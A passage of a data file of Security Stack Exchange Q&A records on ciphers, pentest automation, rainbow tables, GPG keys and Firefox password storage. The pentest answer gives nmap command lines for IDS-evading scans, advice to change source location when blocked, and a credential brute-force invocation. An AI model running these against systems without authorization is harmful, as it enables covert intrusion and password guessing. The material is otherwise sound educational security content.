334 | Encryption algorithms such as Blowfish, AES, RC4, DES and Seal are implemented in one of two categories of ciphers. What are the advantages/disadvantages of each type of cipher? | While both are symmetric ciphers, stream ciphers are based on generating an "infinite" cryptographic keystream, and using that to encrypt one bit or byte at a time (similar to the one-time pad), whereas block ciphers work on larger chunks of data (i.e. blocks) at a time, often combining blocks for additional security (e.g. AES in CBC mode). Stream ciphers are typically faster than block, but that has its own price. Block ciphers typically require more memory, since they work on larger chunks of data and often have "carry over" from previous blocks, whereas since stream ciphers work on only a few bits at a time they have relatively low memory requirements (and are therefore cheaper to implement in limited scenarios such as embedded devices, firmware, and esp. hardware). Stream ciphers are more difficult to implement correctly, and prone to weaknesses based on usage - since the principles are similar to one-time pad, the keystream has very strict requirements. On the other hand, that's usually the tricky part, and can be offloaded to e.g. an external box. Because block ciphers encrypt a whole block at a time (and furthermore have "feedback" modes which are most recommended), they are more susceptible to noise in transmission, that is if you mess up one part of the data, all the rest is probably unrecoverable. Whereas with stream ciphers bytes are individually encrypted with no connection to other chunks of data (in most ciphers/modes), and often have support for interruptions on the line. Also, stream ciphers do not provide integrity protection or authentication, whereas some block ciphers (depending on mode) can provide integrity protection, in addition to confidentiality. Because of all the above, stream ciphers are usually best for cases where the amount of data is either unknown, or continuous - such as network streams. Block ciphers, on the other hand, are more useful when the amount of data is pre-known - such as a file, data fields, or request/response protocols, such as HTTP where the length of the total message is known already at the beginning. | {
"source": [
"https://security.stackexchange.com/questions/334",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/59/"
]
} |
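To make the block/stream distinction concrete, here is a small sketch using the third-party Python cryptography package (assumed to be installed; key, nonce and IV are throwaway random values). AES in CTR mode behaves like a stream cipher and accepts any plaintext length, while AES in CBC mode needs the plaintext padded out to whole 16-byte blocks:

```python
import os
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(32)
message = b"short message of arbitrary length"

# Stream-like usage: AES-CTR, no padding required
nonce = os.urandom(16)
ctr = Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor()
ct_stream = ctr.update(message) + ctr.finalize()

# Block usage: AES-CBC, plaintext must first be padded to the 16-byte block size
iv = os.urandom(16)
padder = padding.PKCS7(128).padder()
padded = padder.update(message) + padder.finalize()
cbc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
ct_block = cbc.update(padded) + cbc.finalize()

# CTR output matches the message length; CBC output is a multiple of 16 bytes
print(len(ct_stream), len(ct_block))
```

Neither mode shown here provides integrity or authentication on its own, which matches the caveat in the answer.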
373 | What order do typical open-source penetration tests operate? Which tools are run first, second, third -- and how do you control them? Does one simply use Metasploit RC files? A network vulnerability scanner in a special way? A command-line, custom, or headless web application security scanner? Any other ways (or even ideas) to speed up penetration-tests that you would be willing to share? Are there open-source projects to help with this process (besides Metasploit RC files or the `save' command under the MSF console)? | The Metasploit Framework is my go-to tool for pentest automation still to this day, however, I do like what I've seen of CORE INSIGHT and Immunity Security SWARM. There are a few tools such as Loki (or the older Yersinia tool), intrace, Chiron , mana-toolkit, mitmf, bettercap, and Responder.py that must be run outside of the Metasploit framework, but so many things can be done inside msfconsole these days (`load kiwi' comes to mind). If you want to see some amazing resources, check out this document which covers performing the full PTES using Metasploit. Metasploit is catching up a little bit here and there (to nearly every tool and technique in existence!), such as the auxiliary/server (and capture) modules. However, many questions remain, such as performance comparisons between auxiliary/spoof/arp/arp_poisoning, arpspoof, macof, arp-sk, nemesis, and ettercap. Does auxiliary/sniffer/psnuffle work any differently than dsniff? What's the difference between Squirtle , auxiliary/server/http_ntlmrelay, and auxiliary/server/capture/http_ntlm? How does http_javascript_keylogger compare to BeEF ? How do auxiliary/spoof/llmnr, auxiliary/spoof/nbs, auxiliary/server/wpad and auxiliary/server/capture/smb compare to Responder.py? Clearly others are simply superior, but I'd like to recode them (or see someone do this) to be part of MSF. For example, shouldn't dns2proxy (from sslstrip2 's author) features exist in auxiliary/server/fakedns? Much of the early work in network penetration testing is done with either nmap or unicornscan, although pbscan , zmap, and masscan have gained a lot of ground in recent years. In particular, dnmap is a sleek approach. There is even a web interface to dnmap called Minions . Here are a few flags I enjoy with regards to nmap: Slow scan (but not too slow), evades IDS, and gives the reason why the packets didn't make their destinations. Best performed one port at a time with data-length or string set when the destination protocol or port isn't known by nmap. Use robtex and csrecon to check your target IP prefixes. Try to identify one or two ports you can leverage that are not web servers, but that have historically been vulnerable to remote code exploitation (N.B., you may need to correlate this data with cvedetails.com or exploitsearch.net). You will notice I have chosen TCP port 623 (IPMI RMCP, an already slow-to-respond service that benefits from these slow scans) in the example, but you could easily change this (although I don't recommend obvious ones such as SSH or RDP -- at least check the Shodan HoneyScore before challenging these). -T1 --max-retries 0 --randomize-hosts --reason -n -Pn -sT -p 623 HTTP or TLS targets will typically run the default ports, so I like to SYN scan them first before scanning other HTTP/TLS targets on non-default ports. The second command will be very slow, but it will likely go under the radar (especially if you use this patch taken from this blog post ), allowing full pivot to the web layer undetected. 
If you find that the web-related ports are open but the http-title script fails, then something is amiss -- potential honeypot warning ! Look for correlation between an open port and a valid, corresponding HTML title element tag that matches the service name and purpose. If a particular IP always responds to any port, then use nmap's --exclude <ip> directive or --excludefile <filename> if you have a list of IPs (similar to nmap's -iL flag). -T1 --max-retries 0 --randomize-hosts --script http-title --reason -n -Pn -r -p 80,443 -T1 --max-retries 0 --randomize-hosts --script +http-title --open -n -Pn -p 81,457,902,995,1100,1128,1241,1581,1883,1944,2301,2375,2381,3010,3037,3128,3780,3790,3872,4000-4002,4100,4567,4848,5000,5250,5800-5802,5814,5986,6060,6405,7000-7002,7080,7181,7272,7443,7510,7770,7778,8000-8001,8008,8014,8028,8040,8081,8085,8088-8091,8095,8140,8161,8180,8200,8222,8300,8400,8443,8500,8776,8834,8880,8883,8888,8980,8999-9000,9002,9060,9080,9084,9090,9191,9292,9389,9443,9495,9990,9999,30821,50000 If everything is in order, switch to faster scans and check for IDS/IPS. You'll know something went wrong when all of your scans stop, but you can be a little more efficient about it by using nmap's traceroute flag (or combine it with the firewalk script), intrace, lft , ttl-mon.py , or osstmm-afd to try and map out these systems. Typically, firewalls that include IPS/IDP functionality, network-based IPS/IDP appliances, UTM, NGFW, and similar network-stack gateways will only sample the traffic to be analyzed every 8-11 seconds. Longer delays between port scans (e.g., the 15-second default in nmap T1 scanning, or by setting a specific 12-second delay in T2 scans) and the lack of parallelization are typically what make these slower scans sneak by intrusion detection of all kinds. Repeat traffic, such as that which is directed to a single port, could also cause intrusion detection bells to go off, identifying traffic as an attack or automatically rejecting it. During the sampling period, intrusion detection might also look for sequential ports. There are a variety of factors to try and identify or play with. Thus, the next nmap flags seen below should be modified to test for this series of IDS-identification strategies. If the first test case (T2 scan with 12-second delay, no retries, and no sequential ports) gets by but the second does not, then you will want to figure out why. Nmap's packet-trace and traceroute capabilities are highly suggested, but other tools such as hping3 or nping may come in useful to support this effort. If you find your traffic blocked (e.g., responses completely stop), you may need to switch the source public-IP (or LAN IP) you're coming from, so I suggest that you run most of these at Starbucks or off your primary, usual location (dnmap will likely also help here). Try not to hit any honeynets (e.g., Fortinet FortiGate, TrapX DeceptionGrid, etc) either, or at least identify them so that you can exclude them in future scans. The best way to avoid these traps is to leverage that scans.io and SHODAN data (and knowledge about the target environment, the kinds of technologies in use -- more useful when performing internal network scans), grab a scoreful of ports (nmap or dnmap at increasing speeds, each with 20 or so unique ports), and avoid the overly-shiny services that are potential honeypots, i.e., 21-23, 25, 53, 110, 135-139, 445, 1337, 1433, 1723, 3306, 3389, 5060-5061, 5800, 5900, 8080, 10000, 31337, and 44443 (N.B., DON'T scan these port numbers yet!). 
-T2 --scan-delay 12s --max-retries 0 --randomize-hosts --open -n -Pn -p26,66,79,113,389,407,465 -T2 --scan-delay 9s --max-retries 1 --randomize-hosts --open -n -Pn -p512-514,523-524 -T2 --max-retries 3 --randomize-hosts --open -n -Pn -p548,554,587,593,873,993,1026,1050,1080,1099,1158,1344,1352,1521,1604,1720,2202,2302,2383 --max-rate 20 --max-parallelism 2 --max-retries 3 --randomize-hosts --open -n -Pn -p2628,2869,2947,3000,3031,3260,3478,3500,3632,3689,4369,5019,5040,5222,5353,5357,5432,5560,5631-5632 --max-rate 40 --max-parallelism 4 --max-retries 3 --randomize-hosts --open -n -Pn -p5666,5672,5679,5850,5920,5984-5985,6000-6005,6379,6481,6666,7019,7210,7634 --max-rate 80 --max-parallelism 8 --max-retries 3 --randomize-hosts --open -n -Pn -p8000,8009-8010,8834,9160,9999,11211,12000,17185,13722,19150,27017,30718,35871,49152,50030,50060,50070,50075,50090,52822,52869,60010,60030,64623 Written below is the next level of nmap scanning (default speed, no randomizing because of the qscan latency checks), giving you lots of detail and potential for movement. Use mostly port numbers you know are open, although select one port that is potentially not open (especially ones in the past that had ambiguous results). Avoid using dnmap or other inefficiencies that will break the qscan script. TCP (typically HTTP or SSL/TLS) ports could be behind reverse-caching proxies, load balancers, redirected at the network level, or similar. The qscan script should help identify these situations, although you will likely want to supplement them with other tools such as halberd (or additional NSE scripts such as http-affiliate-id and http-favicon). In this phase, you can use either IP prefixes, hostnames, or a combination. I suggest using one strong tool here, such as blacksheepwall. Be careful when targeting hostnames because Passive DNS sensors will give away your location and/or intentions much more easily than you think, leading to blocks similar to IPS or WAF (and at this point you will need to be able to distinguish between those three, as well as other defensive countermeasures). Keep testing all ports in the manner directly above until you've exhausted what you already know about the target network(s) and domains. If you have a target SSL/TLS port, the duplicates script will help you understand when a single host is speaking on multiple IPs or networks (typically multihomed). --script qscan --max-retries 7 --reason -Pn --version-intensity 0 -sV -p80,(other found-TCP ports)
--script qscan,duplicates,ssl-cert --max-retries 7 -v --reason -Pn -sV --version-all -p80,443,(others previously-found) Follow this line of thinking with some single port checks using a bad TCP checksum. Utilize your knowledge of the past and build on it. Before you proceed, make certain you have a good idea about the network paths and internals of every packet you send, and predict the responses from this point on out. If you want to build a little extra knowledge at this stage, you might want to use different tools, such as pbscan, portbunny, masscan, zmap, or unicornscan (the -w file.pcap flag could be repurposed here to allow for packet capture analysis much like MSF's pcap_log, but I don't necessarily suggest either approach as cool as they initially sound). If you do have a way (preferably a separate, inline system so that the disk I/O, CPU, and memory usage doesn't affect your scans) to perform packet capture, typically you will want a tool such as netsniff-ng to save pcaps (or a different tool if you require pcapng) and then process the results with p0f and/or PRADS. Fingerprinting can get complex, and there are a few tools besides nmap that you will likely want to leverage at this stage. Targeting port-specific versions isn't necessary quite yet, although it can be accomplished here. I suggest going heavy on the OS-level fingerprinting with "just enough" service identification to correlate. There are old techniques (such as a fork of nmap called cron-os ) that should be ported to a newer tool with a fp database refresh to modern platforms (which is why I suggested p0f and PRADS earlier -- they tend to keep up with the constant change of technologies). Rapid7 has a big-data project for service fingerprinting, recog . Nmap's service versioning is only average when compared to tools such as amap, and there are many point-solution tools such as fpdns, ntp-fingerprint.pl, info2cpe, et al. Vuln scanners such as Nessus incorporate hmap (an HTTP fingerprinter), but there are many tools in that space as well (httprint, httprecon). It's annoying that OS fingerprinting and service versioning are highly problematic. I suggest you do the best you can with the methods and tools I described. --script qscan --max-retries 7 --badsum -v -O --osscan-guess --max-os-tries 1 --reason --send-ip --version-intensity 0 -sV -p80,(at least one closed port) If, and when you do, run into any obvious IPS or other blocks, see the section far below which mentions sniffjoke and other advanced evasion techniques (AETs). If you can actually fingerprint the system(s) blocking your traffic then your best bet is to run a sniffjoke client/server pair in another similar environment where you have server access already (N.B., this could be from a previous pen test or from a lab or mock environment). The above badsum trick should preempt most IPS systems. Other techniques we've been through may have also uncovered these blocking systems. If you find a good AET then you will likely want to run all of your previous port scans over again to see if you have similar results. If you feel that SYN traffic is being throttled (one way to check is to use nmap against a bunch of known-open ports with full TCP connects and the same ports with standard SYN-only), see the below section about SYN-cookie evasion as well as the even-further section on using tcptrace to detect such issues. Scan a few UDP ports, but check with a few different tools to be sure. 
Learn how to import Nmap data to MSF in order to leverage hosts -R in modules like empty_udp (but modify the script to remove 1-1024,2049,5060,5061). We aren't checking any low-range ports because of honeypots, intrusion detection, logging, or other inconsistencies at this time. If any UDP ports are open, this knowledge should supplement what we already know about the live TCP ports on this network. If, because of past knowledge about the target types (from OS or version detection) or target environment, you feel that you could gain more knowledge by scanning for IP protocols such as SCTP, ICMP, IGMP, or otherwise -- then, be careful, consider the consequences, and send out a few probes to verify or build on that knowledge. --max-rate 100 --max-retries 0 --randomize-hosts --reason -Pn -sUV --version-all -p500,523,623,1604,1645,1812,5353,5632,6481,6502,10080,17185 unicornscan 10.0.0.0/24:500,523,1604,1701,1812,2000,3478,5353,5632,10080-10081 -Iv -mU for i in ike db2 citrix net-support netop ; do udp-proto-scanner.pl -p $i 10.0.0.0/24 ; done -T2 --scan-delay 1s --max-retries 0 --randomize-hosts --reason -n -Pn -sO -p132 --max-rate 400 --max-retries 0 --randomize-hosts --reason -n -Pn -sY -p1167,1812,1813,2225,2427,2904,2905,2944,2945,3097,3565,3863,3864,3868,4739,4740,5090,5091,5672,5675,6704,6705,6706,7626,8471,9082,9084,9900,9901,9902,14001,20049,29118,29168,29169,36412,36422 -T2 --scan-delay 1s --max-retries 0 --randomize-hosts --reason -n -Pn -sO -p1 -T2 --scan-delay 1s --max-retries 0 --randomize-hosts --send-ip -n -PM -sn -T2 --scan-delay 1s --max-retries 0 --randomize-hosts --reason -n -Pn -sO -p2 -T2 --scan-delay 1s --max-retries 0 --randomize-hosts --send-ip -n -PP -sn -T2 --scan-delay 1s --max-retries 0 --randomize-hosts --reason -n -Pn -sO -F --exclude-ports 1,2,6,17,132 -T2 --scan-delay 1s --max-retries 0 --randomize-hosts --reason -n -Pn -sO --exclude-ports 1,2,6,17,132 --data-length 3 To be absolutely pedantic, run the below on every active host that responded to anything from past scans. -T2 --max-scan-delay 90ms --max-retries 9 -v -O --osscan-guess -n --send-ip -PE (or -PP if successful and/or -PM if also successful) -sTUV -pT:(at least one closed port but also one open if possible),U:(as T:) --version-all After this most-recent run, you must know nearly everything you can about each host, each port -- it should be obvious to you if there is a honeypot or IDS/IPS/IDP/etc. You'll be able to group them into categories even if not absolutely sure, e.g., "probably Cisco", "flavor of Unix", "definitely IP phones or softphones of some kind", or "unknown hosts but these match a certain profile even though they have differing ports open". You feel ready to start vulnerability analysis and exploitation against these hosts and their identified and/or unidentified ports. You will need to add ports previously found to the following nmap port list so that you get a suitable Nmap XML file for importing into Metasploit or querying with metasploitHelper . Be sure to add TCP/SCTP ports to the "T:" section and UDP ports to the "U:" section. 
--min-rate 100 --max-rate 400 --min-parallelism 16 --max-retries 9 --defeat-rst-ratelimit -sUS -n -Pn -pT:0,1,19,42,49,85,105,111,143,264,402,444,446,502,515,631,689,705,783,888,910,912,921,998,1000,1099,1211,1220,1533,1582,1617,1755,1811,1900,2000,2001,2067,2100,2103,2207,2362,2380,2525,2940,2947,2967,3050,3057,3200,3217,3299,3460,3465,3628,3690,3817,4322,4444,4659,4672,4679,5038,5051,5093,5168,5227,5466,5498,5554,5555,6050,6070,6080,6101,6106,6112,6503,6504,6542,6660,6661,6905,6988,7021,7071,7144,7414,7426,7579,7580,7777,7787,8020,8023,8030,8082,8087,8503,8787,8812,8899,9100,9200,9256,9390,9391,9788,9855,10001,10008,10050,10051,10202,10203,10616,10628,11000,11234,12174,12203,12221,12345,12397,12401,13364,13500,16102,18881,19810,20010,20031,20034,20101,20111,20171,20222,22222,23472,26000,26122,27000,27960,28784,30000,31001,32764,34205,34443,38080,38292,40007,41025,41080,41523,41524,44334,44818,46823,46824,50001,50013,55553,57772,62514,65535,U:19,42,49,69,111,161,631,1900,2049,2362,7777 -oX nmap_target1.xml If you find a good target, you may want to utilize custom Metasploit resources (or "rc") files that consist of notes on modules, their settings, and how to run them. You can find port-number specific rc files here , which can get you on the fast path to a shell. It may require some troubleshooting, but attacking the infrastructure this early on could indicate IPS (network or host) presence or lack thereof. It could also get your IP address blocked, so proceed with caution. You also might want to run some of these port-specific NSE scripts , some of which have important script-args and other tuneables. If you already know for sure that a port is open, or even confident in the target OS/service, then you might as well do something to get more information about their runtime states. Your call, but at this stage in the testing automation you will definitely need to increase the information available to you for decision advantage. Another possibility is to pivot to the web layer, which typically involves running carbonator after a little nmap and nikto action (N.B., you will want to modify your nikto.conf to modify the user agent to one of a normal web browser and perhaps comment out the two mutate lines). You will also want to discover more hostnames and IP prefixes at this time (domaincrawler.com, fierce, knock, dnsmap, and subbrute will help with subdomains and dnsrecon should handle all of the rest). If you have tons of targets then you may want to use webshot to drop images that you can sort through and triage your target selections. If you definitely know there is an IPS or WAF in place, then you may want to switch tactics. -Pn -p 80 --version-all -sV --script "http-waf*",http-devframework,http-enum,http-vhosts -oG - | nikto.pl -h - -Tuning x04689c -D 1 -output nikto.xml -Pn -p 443 --version-all -sV --script "http-waf*",http-devframework,http-enum,http-vhosts -oG - | nikto.pl -h - -ssl -Tuning x04689c -D 1 -output niktotls.xml Now is the time to engage any anti-IDS mechanisms (e.g., sniffjoke, fragroute , and Evader ) or run any last-minute SYN-cookie , IDS, IPS, and WAF detection checks. Finally, go for it! No sense in scanning a single port or small set of ports at this point. 
--script banner-plus --min-rate 450 --min-parallelism 20 --max-retries 5 --defeat-rst-ratelimit -n -Pn -p- unicornscan 10.0.0.0/24:a -D -L 20 -r 450 -Iv -mU unicornscan 10.0.0.0/24:9,42,49,67,88,135,139,162,213,259,260,407,445,464,514,517-523,546,631,657,826,829,1069,1194,1558,1645-1646,1900,1967,2055,2362,2427,2727,2746,3001,3283,3401,3544,4045,4500,4665,5060,5350,5351,5355,5405,5432,6481,6502,8905,8906,9999,17185,18233,26198,27444,32822-32823,34555,41250,47545,49152,49599,54321 -r 450 -Iv -mU The above rates (--min-rate in nmap and -r in unicornscan) are measured in packets per second (pps) and can be modified up to 10000 when on a local network or other ideal conditions. There are patches to change nmap's scan rate dynamically (interactively) here (amazing when combined with tcptrace.org looking for retransmissions and modifying either the min-rate, max-rate, interactive equivalents, min-parallelism, min-hostgroup, or max-retries until maximum bandwidth is achieved). It is difficult to get nmap into a best-fit approach for bulk SYN or UDP scanning, even when using pedantic min-hostgroup, min-parallelism, and min-rate parameters. This is why many people turn to unicornscan, zmap, or masscan. If your target networks and services have very reliable and consistent round-trip times in their server responses (or if you have the time and patience to figure out the network characteristics), nmap/dnmap may be your best bet for tooling consistency if nothing else. You may need to verify new IPs, hostnames, or ports that you haven't seen in the past (such as the honeypot ports we avoided earlier, including SCTP ports 5060-5061 with -sY). Go back to the stage where you ran qscan and retry scenarios using the new information. Continue to check for honeypots by using additional techniques such as Metasploit's detect_kippo module. Be sure to rerun metasploitHelper if applicable. Keep track of all of your information, perhaps by using Dradis, MagicTree, discover.sh XML to CSV conversions, Lunarline VSC, Prolific Solutions proVM Auditor, Cisco Kvasir, or FishNet LAIR. These are better alternatives to Notepad, etc., because they are penetration-test data aware. Similar to earlier, you may find that the duplicates script helps identify multihomed hosts. Common scenarios include a Windows machine with or without SSL/TLS -- or possibly a non-Windows machine running SSH, SSL/TLS, or both (although it is possible that a Windows host could be running SSH, but that's a severely strange corner case).
--script qscan,duplicates,nbstat,ssl-cert --max-retries 7 -v -O --osscan-guess --max-os-tries 1 --reason -Pn -sSUV --version-all -pT:135,139,443,445,U:137 --script qscan,duplicates,nbstat --max-retries 7 -v -O --osscan-guess --max-os-tries 1 --reason -Pn -sSUV --version-all -pT:135,139,445,U:137 --script qscan,duplicates,ssh-hostkey --max-retries 7 -v -O --osscan-guess --max-os-tries 1 --reason -Pn -sV --version-all -p22 --script qscan,duplicates,ssh-hostkey,ssl-cert --max-retries 7 -v -O --osscan-guess --max-os-tries 1 --reason -Pn -sV --version-all -p22,443 If you find any open ports with services (or apps of any kind) that require any form of authentication, then you will want to read and configure the protocol-specific scripts, but generically your nmap/dnmap command-line arguments should look like: --min-rate 100 --max-retries 5 -n -Pn --script brute,creds-summary --script-args unsafe,brute.mode=pass,userdb=usernames.lst,passdb=passwords.lst,brute.firstOnly,brute.guesses=2 --version-all -sV (-sUV or -sUSV, if appropriate) The above could be performed with dnmap using a different passwords.lst file on each server in order to increase attempts, to brute from different IP addresses, or a variety of other scenario-dependent options. Finally, let's talk about how nmap/dnmap can really shine -- by bringing it all together after you know that SYN scanning works, you have UDP probes figured out (note that many of the below are missing in the nmap-payloads, nmap-service-probes, Unicornscan etc/payloads.conf, and udp-proto-scanner.conf files -- so you may have to create them manually!) and that IDS/IPS isn't going to be a bother for your automation. Let's say you aren't just on a coffee break, you can't take "just another nap", and your significant other demands some attention and a normal 8-hour sleep routine. Well, fire up nmap/dnmap this way and you'll get some great results for when you come back to the console! 
--min-rate 100 --max-retries 5 --defeat-rst-ratelimit --randomize-hosts --open -Pn -v -O --osscan-guess --max-os-tries 1 -sUSV --version-all --script banner,duplicates,nbstat,ssh-hostkey,ssl-cert,vuln,vulscan,brute,creds-summary --script-args vulns.showall,unsafe,vulscanversiondetection=0,brute.mode=pass,userdb=usernames.lst,passdb=passwords.lst,brute.firstOnly -pT:0,1,19,26,42,49,66,79-81,85,105,111,113,135,139,143,264,389,402,407,443-446,457,465,500,502,512-515,523,524,548,554,587,593,623,631,689,705,783,873,888,902,910,912,921,993,995,998,1000,1026,1050,1080,1099-1100,1128,1158,1167,1211,1220,1241,1337,1344,1352,1433,1521,1533,1581,1582,1604,1617,1720,1723,1755,1811-1813,1900,1944,2000-2001,2067,2100,2103,2202,2207,2225,2301-2302,2362,2375,2380,2381,2383,2427,2525,2628,2869,2904,2905,2940,2944,2945,2947,2967,3000,3010,3031,3037,3050,3057,3097,3128,3200,3217,3260,3299,3306,3389,3460,3465,3478,3500,3565,3628,3632,3689-3690,3780,3790,3817,3863,3864,3868,3872,4000-4002,4100,4322,4369,4444,4567,4659,4672,4679,4739,4740,4848,5000,5019,5038,5040,5051,5060-5061,5090-5091,5093,5168,5222,5227,5250,5353,5357,5432,5466,5498,5554-5555,5560,5631,5632,5666,5672,5675,5679,5800-5802,5814,5850,5900,5920,5984,5985,5986,6000-6005,6050,6060,6070,6080,6101,6106,6112,6346,6347,6379,6405,6481,6503,6504,6542,6660-6661,6666-6667,6704-6706,6905,6988,7000-7002,7019,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7579,7580,7626,7634,7770,7777-7778,7787,8000-8001,8008-8010,8014,8020,8023,8028,8030,8040,8080-8082,8085,8087-8091,8095,8140,8161,8180,8200,8222,8300,8400,8443,8471,8500,8503,8776,8787,8812,8834,8880,8888,8899,8980,8999,9000,9002,9060,9080,9082,9084,9090,9100,9160,9191,9200,9256,9292,9390,9391,9443,9495,9788,9855,9900,9901-9902,9990,9999,10000-10001,10008,10050-10051,10202,10203,10616,10628,11000,11211,11234,12000,12174,12203,12221,12345,12397,12401,13364,13500,13722,14001,16102,17185,18881,19150,19810,20010,20031,20034,20049,20101,20111,20171,20222,22222,23472,26000,26122,27000,27017,27960,28784,29118,29168,29169,30000,30718,30821,31001,31337,32764,34205,34443,35871,36412,36422,38080,38292,40007,41025,41080,41523-41524,44334,44443,44818,46823,46824,49152,50000-50001,50013,50030,50060,50070,50075,50090,52822,52869,55553,57772,60010,60030,62514,64623,65535,U:7,9,11,13,17,19,36-37,42,49,53,67,69,88,111,123,135,137,139,161-162,177,213,259,260,407,445,464,500,514,517-521,523,546,555,623,631,657,826,829,921,1069,1194,1434,1558,1604,1645-1646,1701,1812,1900,1967,2000,2049,2055,2221,2302,2362,2427,2727,2746,3001,3283,3401,3478,3544,4045,4104,4500,4665,5060,5350,5351,5353,5355,5405,5432,5555,5632,6481,6502,7001,7004,7777,7983,8905,8906,9999,10080-10081,17185,18233,26198,27444,27960,31337,32767-32774,32822-32823,34555,41250,47545,49152,49599,54321 Just a little effort with nmap can save you a lot of time if you engage with OpenVAS or Metasploit later on. I prefer to run nmap and OpenVAS from within the msfconsole so that all of that data makes it into the MSF database. One could also export tool data to Metasploit-consumable XML, or use a tool like nmap2nessus. An important lesson to learn about vulnerability scanners is that they miss a lot of real-world vulnerabilities. By running nmap/dnmap overnight in the manner described above you will get to see the potential for every single vulnerability path. 
Most of them won't work at first shot -- nmap/dnmap will tell you that they failed (but not the real "why", even if you think its reason is valid) -- so it is up to you to figure out if the vulnerability can lead to exploitation or not. Go back to the earlier discussion about port-number specific Metasploit and Nmap NSE files, it is even more relevant now. Know the internals of these scripts and how to troubleshoot each line of code that they consist of. A little offset, a small parameter, or a few combinatorial tweaks will grab that shell that every other penetration tester would have missed. | {
"source": [
"https://security.stackexchange.com/questions/373",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/140/"
]
} |
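As a small illustration of gluing these stages together, here is a hedged Python sketch (the target range, port list and file name are placeholders) that runs one nmap pass with XML output and extracts the open ports per host; the same XML file can then be pulled into Metasploit with db_import:

```python
import subprocess
import xml.etree.ElementTree as ET

targets = "10.0.0.0/24"   # hypothetical target range
subprocess.run(["nmap", "-sS", "-Pn", "-n", "--open",
                "-p", "22,80,443,445,8080", "-oX", "scan.xml", targets],
               check=True)

open_ports = {}
for host in ET.parse("scan.xml").getroot().iter("host"):
    addr = host.find("address").get("addr")
    for port in host.iter("port"):
        if port.find("state").get("state") == "open":
            open_ports.setdefault(addr, []).append(int(port.get("portid")))

for addr, ports in sorted(open_ports.items()):
    print(addr, ports)   # feed these hosts/ports into the next, slower stage
```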
379 | Where can I find one? Is there a pot of gold at the end? How do I protect against them? From the Area51 proposal This question was IT Security Question of the Week. Read the Sep 09, 2011 blog entry for more details or submit your own Question of the Week. | Rainbow Tables are commonly confused with another, simpler technique that leverages a compute time-storage tradeoff in password recovery: hash tables. Hash tables are constructed by hashing each word in a password dictionary. The password-hash pairs are stored in a table, sorted by hash value. To use a hash table, simply take the hash and perform a binary search in the table to find the original password, if it's present. Rainbow Tables are more complex. Constructing a rainbow table requires two things: a hashing function and a reduction function. The hashing function for a given set of Rainbow Tables must match the hashed password you want to recover. The reduction function must transform a hash into something usable as a password. A simple reduction function is to Base64 encode the hash, then truncate it to a certain number of characters. Rainbow tables are constructed of "chains" of a certain length: 100,000 for example. To construct the chain, pick a random seed value. Then apply the hashing and reduction functions to this seed, and its output, and continue iterating 100,000 times. Only the seed and final value are stored. Repeat this process to create as many chains as desired. To recover a password using Rainbow Tables, the password hash undergoes the above process for the same length: in this case 100,000 but each link in the chain is retained. Each link in the chain is compared with the final value of each chain. If there is a match, the chain can be reconstructed, keeping both the output of each hashing function and the output of each reduction function. That reconstructed chain will contain the hash of the password in question as well as the password that produced it. The strengths of a hash table are that recovering a password is lightning fast (binary search) and the person building the hash table can choose what goes into it, such as the top 10,000 passwords. The weakness compared to Rainbow Tables is that hash tables must store every single hash-password pair. Rainbow Tables have the benefit that the person constructing those tables can choose how much storage is required by selecting the number of links in each chain. The more links between the seed and the final value, the more passwords are captured. One weakness is that the person building the chains doesn't choose the passwords they capture so Rainbow Tables can't be optimized for common passwords. Also, password recovery involves computing long chains of hashes, making recovery an expensive operation. The longer the chains, the more passwords are captured in them, but more time is required to find a password inside. Hash tables are good for common passwords, Rainbow Tables are good for tough passwords. The best approach would be to recover as many passwords as possible using hash tables and/or conventional cracking with a dictionary of the top N passwords. For those that remain, use Rainbow Tables. | {
"source": [
"https://security.stackexchange.com/questions/379",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/33/"
]
} |
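A toy sketch of the chain construction described above, in Python: MD5 as the hash, a truncated Base64 digest as the reduction, and the link index mixed in so that each link effectively uses a different reduction function. All parameters are illustrative; real tables use far longer chains and carefully tuned reductions.

```python
import base64
import hashlib

PASSWORD_LEN = 8    # length of the reduced "password" candidates (toy value)
CHAIN_LEN = 1000    # links per chain (toy value)

def H(pw: str) -> bytes:
    return hashlib.md5(pw.encode()).digest()

def R(h: bytes, link: int) -> str:
    # reduction: mix in the link index, Base64-encode, truncate to password length
    mixed = hashlib.md5(h + link.to_bytes(4, "big")).digest()
    return base64.b64encode(mixed).decode()[:PASSWORD_LEN]

def build_chain(seed: str):
    pw = seed
    for link in range(CHAIN_LEN):
        pw = R(H(pw), link)
    return seed, pw      # only the two endpoints are stored in the table

print(build_chain("letmein1"))
```

Only the (seed, endpoint) pairs are stored; recovering a password means walking the reduction/hash sequence from a captured hash until an endpoint matches, then rebuilding that one chain to find the preimage.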
406 | I've just started to use GPG and created a public key. It is kind of pointless if no-one knows about it. How should I distribute it? Should I post it on my profile on Facebook and LinkedIn? How about my blog? What are the risks? | Best way to distribute your key is by using one of the key servers that are available, such as keyserver.ubuntu.com , pgp.mit.edu or keyserver.pgp.com . If you use Seahorse (default key manager under Ubuntu), it automatically syncs your keys to one of these servers. Users can then look up your key using your email address or keyid. If you wanted to post your public key on LinkedIn or your blog, you can either upload the key to your server or just link to the page for your key on one of the keyservers above. Personally, I would upload it to one of the keyservers and link to it, as it is easier to keep it up-to-date in one place, instead of having the file in loads of different locations. You could also share your keyid with people, and they can then receive your key using gpg --recv-keys . If you wanted to post your public key on Facebook, there is a field to place it under the Contact Info section of your profile. You can also change your Facebook security settings to use this same public key to encrypt their emails to you. For example, here's my public key . To my knowledge, there are no risks associated with publishing your public key. | {
"source": [
"https://security.stackexchange.com/questions/406",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/157/"
]
} |
408 | I'm relying on Firefox to remember my passwords, using a Master Password of more than 25 characters. How secure is this set-up? | In short - Firefox uses triple DES in CBC mode with Master Password. More details: a nice article about this topic is here: http://luxsci.com/blog/master-password-encryption-in-firefox-and-thunderbird.html and if you want some more details, here is the mozillaZine article: http://kb.mozillazine.org/Master_password . This article gives you a detailed comparison between the major browsers. It is believed that it is safe to store passwords this way; however, I do not trust any software. Maybe it sounds too paranoid, but we can never know where the vulnerability hides. | {
"source": [
"https://security.stackexchange.com/questions/408",
